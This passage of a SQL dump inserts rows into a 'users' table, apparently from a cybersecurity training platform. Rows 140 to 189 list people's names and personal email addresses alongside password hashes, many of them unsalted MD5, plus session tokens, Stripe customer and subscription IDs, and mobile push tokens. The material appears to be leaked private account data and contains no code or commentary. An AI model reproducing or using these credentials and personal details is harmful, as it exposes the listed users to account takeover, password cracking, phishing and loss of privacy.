(140, NULL, 'Rhylan', 'rhylan.hildner@snhu.edu', '$2a$10$hvMe2/b2W0F0UDbxUntp9.geU.nLj3GUSbWFKm/gqaLQ23fkF6Msm', 'pro', NULL, 'monthly', 'active', 'sub_1SzgsqL5VKtXn66ba6zd5x5X', 'cus_Txc72zGGxj1dKN', 0, NULL, NULL, NULL, NULL, 0, '2026-02-11 20:03:12', 'rhylan', 'Hildner', 1, NULL, NULL, NULL, 3, '2026-03-03 03:54:10', NULL, '2026-02-11 17:03:12', '2026-03-11 20:07:25', 1, 0, NULL, '982896c988cdd5fb9443f2ccb942a5dafa39afb777149ffa443103a13da1bc75', NULL, 'SIEM', 'MAL', NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(141, NULL, 'Charles', 'chuck.albayrak@gmail.com', '$2a$10$OWesTUR4NWeEDQCvgptI..DD2MxRSP/yiKmZRlBbEhXBLdM40ZzbC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-12 06:14:49', 'cyberjayhawk', 'Albayrak', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-12 03:14:49', NULL, 1, 0, NULL, 'bb1ef31db751eaa114082f108e0c700a4c45a0acb538e950afec2a9df6f03805', NULL, 'TI', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(142, NULL, 'Julia', 'blakveilbrds@gmail.com', '1183a987db5f09393431feadf94dfbeb', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-07 08:08:44', 'blakveilbrds127c1b', 'Munoz', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 06:26:32', NULL, 1, 0, NULL, '285174fc865a757fe4110fe2b5a42883f06be306f23640f3a47999c4bc79c89a', 'f569fac85600e946030cfede3e9b921f6dbef4069a5e079eb876a70e07f29bb4', 'SIEM', 'EDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(143, NULL, 'Mohamed', 'mohamedrimzanabdulraheem@gmail.com', '$2a$10$F.qiGNf9vZSFmn8v4326sO81Xhb3wFobN2q4nKmFpTNUfbw4ZTR0G', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 11:38:18', 'Cybersentinel', 'Rimsan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 08:38:18', NULL, 1, 0, NULL, '711900913ce459b29e57fd4bdede1f4ac8bb61a5ae110a723727f3a215bfd7bb', 'fab355d9e8768188672059eaaed25a6985b8ead5be1f253a5e179e8a39f30ab3', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(144, NULL, 'Ryan', 'ryansalomon59@gmail.com', '$2a$10$lkEhFhe2u1TvPRGBZCtU.uwtCUHutj/f036cntJJCn2/oR6tHwzRK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 12:27:26', 'Salo22', 'Salomon', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 09:27:26', NULL, 1, 0, NULL, '1215a664916df039ee1d53f7a73c55a313e8716c879c25e9fdee84eff71f66ef', 'fc5ec141dee422e75c62c49ee6de44a2c7ef5e428f29322a8d0010f89d6f20c3', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(145, NULL, 'Nagaraju', 'cybersec352@gmail.com', '0d4bcf56a45b62b06be6a4eda1ab4956', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-14 12:36:58', 'cybersec352286764', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 09:36:58', NULL, 1, 0, NULL, '00e6137b4bdbe7b8aa5ee9d603a718536e428bee3c05d928c308b0ba33bc0764', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(146, NULL, 'My', 'mysofinet@gmail.com', 'd145f43a1f652a5954fbe489f6b27b1f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 18:55:19', 'mysofinetb8f7c7', 'Sofinet', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 15:55:19', NULL, 1, 0, NULL, '6e46386f1824ae5b5353942c372d01bf2a9ea2f308cde6371bcf5e5a6252e3df', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(147, NULL, 'Mehmet', '75aksu75@gmail.com', '014358019d2d6ede824a4f3e1905b71f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 19:15:23', '75aksu75cdcd99', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 16:15:23', NULL, 1, 0, NULL, 'dcad7b8ad2922c473d663641e4fa1448c79bc9722ce6b089495cf5ed75ab4d21', NULL, NULL, NULL, 'ExponentPushToken[i2ORC3KX1d0TwNzcvb4BxS]', NULL, 0, NULL, 'web', 0, 1, 0),
(148, NULL, 'Nesibe', 'nesibenur@gmail.com', '4c2514621a7d1ec851b346299db0d956', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 20:00:19', 'nesibenur2cd26e', 'Yilmaz', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 17:00:19', NULL, 1, 0, NULL, 'fcae5eef07cd73dc381ec2935a8874b965625852e721fc8b383e3aca3980c1df', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(149, NULL, 'Ozlem', 'ozlemkor2000@gmail.com', '45c6a266dd7f052b4bf930413aaedf76', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 20:53:22', 'ozlemkor2000c75866', 'Ozkan Kor', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 17:53:22', NULL, 1, 0, NULL, '8491e81dcd2f71f0cfbcb35add2c3f22179e87539980bfcf55e9695fa6d753ea', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(150, NULL, 'Fuat', 'fuatozarslan034@gmail.com', '73524b5503f382c84d2e941f0bf5327a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 21:33:41', 'fuatozarslan0349941b5', 'Ozarslan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 18:33:41', NULL, 1, 0, NULL, 'a8b8a8d953d88951e29f5767bb6a73992b97649e1a9ab3af82eabfe1ac73b0ca', NULL, NULL, NULL, 'ExponentPushToken[ULmq6NPrWFeyCmpZFJu-Ie]', NULL, 0, NULL, 'web', 0, 1, 0),
(151, NULL, 'Ansh', 'mandaniansh2323@gmail.com', '294a7b79eee43097e927a1615d3e1016', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 22:16:08', 'mandaniansh2323c721af', 'Mandani', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 19:16:08', NULL, 1, 0, NULL, 'e3c014e246141c74838c4323ee2811eb1426ec0a33dea3bccea55f47eac30c8c', NULL, NULL, NULL, 'ExponentPushToken[LtDa8dADDvm_lRKWbTgfQO]', NULL, 0, NULL, 'web', 0, 1, 0),
(152, NULL, 'Mr', 'biyofalcon@gmail.com', 'f8db0cf14cf75794226b383215d09aad', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 04:20:19', 'biyofalcon30dac4', 'Falcon', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 01:20:19', NULL, 1, 0, NULL, '7d6fc91c0c1e646b94dcebf40a244fb3dbad06c796afde4d30ed651090b0e999', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(153, NULL, 'Thulani ', 'Manzakhevico@gmail.com', '$2a$10$URGmNrY9dlhpVh0kYcMQ1.ZslJ8nCtMWdeXxUKnxbqZtMdgX.qtV6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 04:37:03', 'VicoT', 'Cele', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 01:37:03', NULL, 1, 0, NULL, '0f00b6d90ee834578316a71cb4f89224948840047f5d437ac8364abf19fc5a3d', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(154, NULL, 'Night', 'Nighthf3@gmail.com', '$2a$10$Lmjj4Q6k7eLoitCLAs4hHe85aM/rbFQLaBtGnYrVnKSldhfiUyqxC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 06:39:54', 'Nighthf', 'Hf', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 03:39:54', NULL, 1, 0, NULL, 'f95c18627afc822abce17a66a92472ef79db7e0a29bdc2650496e963281dbbb5', 'f437032c5a1656defa391e09b4356a5396632ab187f7101370c421f49c65143e', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(155, NULL, 'Sohail', 'ilaliahos098765@gmail.com', '478c6b43e43a4d6e352f6730fd663261', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 14:06:24', 'ilaliahos098765075d4a', 'Ali', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 11:06:24', NULL, 1, 0, NULL, '1a15b55aac74ecb8cdab6d10d76681fad23cd68ecf486f450b6cf8c27cb5add7', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0);
INSERT INTO `users` (`id`, `google_id`, `name`, `email`, `password`, `role`, `profile_picture`, `subscription_plan`, `subscription_status`, `subscription_id`, `customer_id`, `cancel_at_period_end`, `current_period_end`, `plan_start_date`, `plan_end_date`, `renewal_date`, `alerts_this_month`, `last_usage_reset`, `username`, `surname`, `is_verified`, `verification_token`, `reset_password_token`, `reset_password_expires`, `failed_login_attempts`, `lock_until`, `badges`, `created_at`, `subscription_end_date`, `current_mission`, `training_completed`, `email_preferences`, `session_token`, `mobile_session_token`, `primary_path`, `secondary_path`, `expo_push_token`, `banner_url`, `is_student`, `organization_id`, `registration_source`, `verification_reminder_sent`, `is_subscribed_newsletter`, `first_push_sent`) VALUES
(156, NULL, 'Arven', 'ravencyber888@gmail.com', '7e8d1c0b15019ca1a48a7e211c9ded12', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-15 23:43:33', 'ravencyber8882e2be2', 'Saromines', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 20:43:33', NULL, 1, 0, NULL, '5b45e5068a3000f375a96ef0ffb530b0b847fc5ec7541588990f00968f3e1178', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(157, NULL, 'Juan Manuel', 'juanmanuel.sanz.gonz@gmail.com', 'eaa0708cd328498e1a1b6a970e26f15f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 00:26:25', 'juanmanuel.sanz.gonz7cf9a9', 'Sánchez González', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 21:26:25', NULL, 1, 0, NULL, 'b8159054ca81bd467f15a6732720ee07043a92e439d01df7e312695140c34793', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(158, NULL, 'Stalin', 'stalin43@hotmail.com', '$2a$10$n0dhjkfIQ527V5d1NY6DDujK67r.epEKkwpdLDDbtqRPuUNM928Ji', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 02:19:10', 'stalin43', 'Garcia ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 23:19:10', NULL, 1, 0, NULL, '485162de10735a1a9dd3f9bcb86f230311a17b23057504f7049a1f87f05a6672', '54135412aeac14c9446bb8e80e4497ce4410fa609004de5a33054cc0e1017928', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(159, NULL, 'Kandice', 'turnerkm78@gmail.com', '062c150dd65dce231bb081a0567b0e58', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-16 02:22:18', 'turnerkm781dbd02', 'Turner', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 23:22:18', NULL, 1, 0, NULL, 'e0e26ed85f75e4ad69259db21cfc293aebd4e65e4fb3c795ab130c2c4bfaaee9', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(160, NULL, 'Xabi', 'xabihomelab@gmail.com', '4428a9790341744d493ce1de7bdb2379', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 02:40:38', 'xabihomelabbc57d0', 'Homelab', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-15 23:40:38', NULL, 1, 0, NULL, 'bc17a55d66751ed000eb2874e3ad67f1e0b7c407ba3f6a2c2f411e594b1b24a6', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(162, NULL, 'Chetan', 'rchetan941@gmail.com', '46a95a72a7014711cbf61de7355c190d', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 15:06:12', 'rchetan941d2edc0', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 12:06:12', NULL, 1, 0, NULL, '1da66f6d85c524cd38808a4435f8e024a0f8f9352620badf897f8d15a6aac159', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(163, NULL, 'L', 'kimchi.tiger@gmail.com', 'f9eafa0915b52448ade084bed8461ce9', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 15:22:16', 'kimchi.tigerda4536', 'H', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 12:22:16', NULL, 1, 0, NULL, '8de6846a351d6482d385874563b1d5b97a1042dda1a4bb34286b7feb54e67bec', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(164, NULL, 'Recep', 'recepcybersec@gmail.com', 'd3a332c176f5533be8d5e4bf54711140', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-16 17:54:11', 'recepcybersec796dcd', 'Guner CISSP CCNA', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 14:54:11', NULL, 1, 0, NULL, 'fb0ec88dbcf36fab55133440e67656145c5708e3cf99c0bef8fff31fbe7d4f0f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(165, NULL, 'Pranith', 'pranithjainbp84@gmail.com', 'ac9a7c91d62841b5ee6b350b461371b3', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-16 20:14:50', 'pranithjainbp84dcaa20', 'Jain', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-16 17:14:50', NULL, 1, 0, NULL, '4f8430a31a841015f221977e667824a22f8d6b0913f0e2140dbf57e359e9b9d7', NULL, 'TI', 'DLP', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(166, NULL, 'Gregory', 'gregorypatterson2255@gmail.com', 'dc9a6dd3a2f06d30a346ccb8232260de', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-17 18:29:04', 'gregorypatterson2255db67cd', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-17 15:29:04', NULL, 1, 0, NULL, 'e503cd9501f7932ac1cf57e6bf00c5e88d1593d98d43f211d20651699209a0fb', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(168, NULL, 'Preetam', 'duttapreetam892@gmail.com', 'bd662ec1c075ba77c7b9df4d3d285246', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 09:47:45', 'duttapreetam892781895', 'Dutta', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 06:47:45', NULL, 1, 0, NULL, '090f02429a60b71c9040a29121bbaaef1bfb3eec37ba84c061c383a63a058cd0', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(169, NULL, 'Hesham', 'hobide32@hotmail.com', '$2a$10$t/VGQhz0ol2v.mL0xqe1A.t/vbxIs7oBSokG6muTTf/cZzKSGZHOy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 10:15:42', 'BigBoss', 'Obied', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 07:15:42', NULL, 1, 0, NULL, '0da1fa3c817be931ba3bad78f9d737b3fbe4d05e36a55d84b85636d34674aea5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(170, NULL, 'BROTHER', 'yoviso3371@fentaoba.com', '$2a$10$KxSIvnqv8mEF0reWdxPfNeqPuJ5lgcvOL30fuLd9jVB6LTnZUW4wi', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 11:18:30', 'BROTHERHOOD ', 'HOOD ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 08:18:30', NULL, 1, 0, NULL, 'f1e91684fad1587e19c7c810a45901e7b8cd8fe7b1094472e3e0206cbae50803', 'd5fca9317b3d8b941e2e217c953949ce493d12cb6dc14f252661fd0c9e1665b4', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(171, NULL, 'Hakan', 'hakanonay01@gmail.com', '$2a$10$tZ9hckMJotgNxAFk4nQp3.u.4XuLqS1HFa5RMvAe86/g8jrq/X.sq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 12:48:53', 'Hakan', 'Hakan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 09:48:53', NULL, 1, 0, NULL, '7b5dec3dce07a4a715376ccd1400701ace4b668e67bf81f385336d15b1fee18b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(172, NULL, 'NIKHIL', 'nikhilmurali004@gmail.com', '2d13114b5a47e2dd0f13e719a7f79e13', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 14:05:56', 'nikhilmurali0045ee554', 'MURALI', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 11:05:56', NULL, 1, 0, NULL, '4a9f498bf9ed959edf405e4207f5c8ecee1cf3a091ea1c01bb3283102ee75f6b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(173, NULL, 'Karibou', 'infoseclabs.v29ct@8shield.net', '$2a$10$s.UmqUWFYqE9FQTNlvPKAuKWsH7UfT8pPNU0c3jmOutdNAMw6pvue', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 15:12:56', 'Karibou', 'Ulu', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 12:12:56', NULL, 1, 0, NULL, '936258fc26d77fcd1f751cd7f6629b3cbdb01f04446331e0ac0ecb9a8012ad95', '8d22384638f886289111b4c7fbc834ce61802ca70054434d8c9563c8ba1b28b9', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(174, NULL, 'Shannon', 'srking0820@gmail.com', 'f6cc81ef7f629aba4ef5bf7d649ed808', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-18 18:07:07', 'srking08208318fe', 'King', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 15:07:07', NULL, 1, 0, NULL, 'a2b39c610b82cc5416e3fbfc6fbcea069d20cfecf67a68980d0ea82335f41618', '528a9754e10a8ab7b5f96a2dae888a61626d55f6ea9743ec772bd8ac7711cf4c', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(175, NULL, 'stacey', 'ncitstl@gmail.com', 'ee99be90ed39ec8a6a61ede7a67229f2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-18 18:40:00', 'ncitstl70b5fb', 'lucas', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-18 15:40:00', NULL, 1, 0, NULL, 'e6a984f546d001313f28435bfac67966e1d212e6cf555e85afffd5b514ca2180', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(176, NULL, 'anis', 'anisrotio@gmail.com', '91f03f36a71f3ab309d0e1a8358b346b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-19 06:47:10', 'anisrotio760c0c', 'abbas', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 03:47:10', NULL, 1, 0, NULL, '5a1c2a585f946617c827a54f66a3c88e9112a39a80fbda050de3b6cae0484895', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(177, NULL, 'Abhishek', 'abhisheknayak0440@gmail.com', '4059c82c5075bc631d99e15e038791c6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-19 07:01:42', 'abhisheknayak0440a63467', 'Nayak', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 04:01:42', NULL, 1, 0, NULL, '6900349fd2bab3498dc13cb3fb22b244a4da5d15e6d9f013e8fdedae8d9b215b', '9f881ee67f41e3e9eade2d077f5fa269c0f66acc775429e7a11f49742dceabfa', 'SIEM', 'EDR', 'ExponentPushToken[_QnaaJGz1UOXdhiA8e6aiP]', NULL, 0, NULL, 'web', 0, 1, 0),
(178, NULL, 'Akhmad', 'akukausar@hotmail.com', '06cc3e5c1672c3ee988ae89a820cfe7c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-03 11:41:33', 'akukausarbe12b6', 'Kautsar', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 05:19:11', NULL, 1, 0, NULL, 'c6d6bbdd38a07a3235040a53edf959e346eacd809a7748a983e97e1aaeeab3f0', NULL, 'SIEM', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(179, NULL, 'Tushar', 'tusharahire7000@gmail.com', '3ede145b30ca879398b7c3422f4d3db5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-19 15:58:33', 'tusharahire70005dfc03', 'Ahire', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-19 12:58:33', NULL, 1, 0, NULL, 'ce6135738c752572c86509326f842e35a0e87235e861cd76266a08bf285493c9', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(180, NULL, 'Yogesh', 'warany204gesh@gmail.com', '$2a$10$nt0Vfi1VBN36gaptEglUqeKEa/4GBKvfMW.IQb4wD27xdprwQIehy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-19 18:44:04', 'warany204gesh3de92c', 'Waran', 1, NULL, NULL, NULL, 3, '2026-03-09 11:59:36', NULL, '2026-02-19 15:44:04', NULL, 1, 0, NULL, 'fc4e74364b8c8f8ae2769ae2e2e7f8b754b2d38d3abb9fdffd915a7f3351a7f0', 'c0d7452fd8c54ce3e13beb3da87a7eb2f128fe0e89b64344246dfd5e9b7ec348', NULL, NULL, 'ExponentPushToken[i_FyFOHIPsLlkUgnG96WxK]', NULL, 0, NULL, 'web', 0, 1, 0),
(181, NULL, 'Anita', 'anita.yankson89@gmail.com', '$2a$10$bz9f2MR8SzI/tB0bk.4Epe0dXwKWx.fVWTKEe7BYpEtr6yk4g/aXu', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 05:32:46', 'Anny', 'Yankson ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 02:32:46', NULL, 1, 0, NULL, '46c0e1def6eb19b162183b4a0366ccd66fcff82d65493fd19a85a55e316c15aa', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(182, NULL, 'Apple', 'Apple@infoseclabs.io', '$2a$10$55hQrlLU11WqBZy3Uako0OoyTR4a1HBWbWT3kQJQSuOcE8enT6VOm', 'normal', NULL, 'pro', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 06:10:13', 'Apple', 'Lover', 1, '50c67b472c3970b3e093d1f0e927626e7947fa187a3ef1dd25481389b7f6a710', NULL, NULL, 0, NULL, NULL, '2026-02-20 03:10:13', NULL, 1, 0, NULL, '0852681ab81cdbe473a29570cf7e37848ea6e37db7b5441a360230186b79c819', '9b56f4ea457458ed5a5583b1ded05a5c5a16e940f6602a0674a2f0685b32ae83', NULL, NULL, NULL, NULL, 0, NULL, 'mobile', 0, 1, 0),
(183, NULL, 'Chetan', 'cstpm5055@gmail.com', '8f48aeae7c699cf2409f9fc1e6a8ef40', 'pro', NULL, 'monthly', 'active', 'sub_1T2l74L5VKtXn66brujAYOq2', 'cus_U0mgzsSoEysb3M', 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 06:54:43', 'cstpm50556f2811', 'CS', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 03:54:43', NULL, 1, 0, NULL, 'dadf3dc876a1b6da9faac335fcf5c518245eeaa615bbfbbfcaa3c3f8672b346b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(184, NULL, 'Khadir', 'kmanjoor27@gmail.com', 'd4c24705f667869d66989795ad539d12', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 10:52:51', 'kmanjoor272fe0ba', 'Manjoor', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 07:52:51', NULL, 1, 0, NULL, '27e1c140208f6b6ec5c3b486b60515e3e78ebfc4038f6eac5e48b74d32edd3ad', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(185, NULL, 'Ryan', 'daydaymichaelryan@gmail.com', 'dd331efc3c90f7f98ff96069a054cf7b', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-20 11:58:17', 'daydaymichaelryanc60a53', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 08:58:17', NULL, 1, 0, NULL, 'e4c38a6c31ddc07667a7755c72e762c7129f31f83d0a663c940acfd204a75024', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(186, NULL, 'SanketCyber', 'sanketcyber58@gmail.com', '283beea60bc41bb007549e5283fccc4a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-20 19:30:37', 'sanketcyber58b7b6a0', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-20 16:30:37', NULL, 1, 0, NULL, 'c13d204fe0e71c559fb86c0dab944bb967730984e5ad00a141f360fdd92b0f64', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(187, NULL, 'Jithin', 'jithuahalya@gmail.com', 'bb4c18c907223fe657c9a9434601d658', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 2, '2026-03-15 06:16:15', 'jithuahalya36fc12', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-21 03:05:53', NULL, 1, 0, NULL, '6a74a2f5878e92571667e0beb38110ca06c0ae49056f22d9e0e0e5c7abb73c02', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(188, NULL, 'Digvijay', 'dvsingh335@gmail.com', '89f6542e94500ebc3ae822dbd5a52dcb', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-21 18:36:57', 'dvsingh335fc9841', 'Singh', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-21 15:36:57', NULL, 1, 0, NULL, '1d25db757a39f2122e954ac9f90d44b1a2d03b15ec5832cf5d6f061ec6f5aed4', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(189, NULL, 'Amadou', 'ame.cyberops12@gmail.com', '$2a$10$I86CVmzQTSB9Y.r8a3/NnetTiHfbfNpdpv9VS4PMsyu7igcs02zG2', 'pro', '/uploads/189-1771703452023.jpeg', 'yearly', 'active', 'sub_1T3NIiL5VKtXn66bIU5VlBZv', 'cus_U1Q7lRwbBVd0Z8', 0, NULL, NULL, NULL, NULL, 1, '2026-02-21 21:33:55', 'Longshadow', 'Mane', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-21 18:33:55', NULL, 1, 0, NULL, '215b9cffd52149cec3fd21922fe9147e84267feec4b07ed83ccab4d3626914e0', '7dbf751049b2fd5c13401b2945e260259503b245ae163c7291b0c3e57bf351c2', 'SIEM', 'EDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
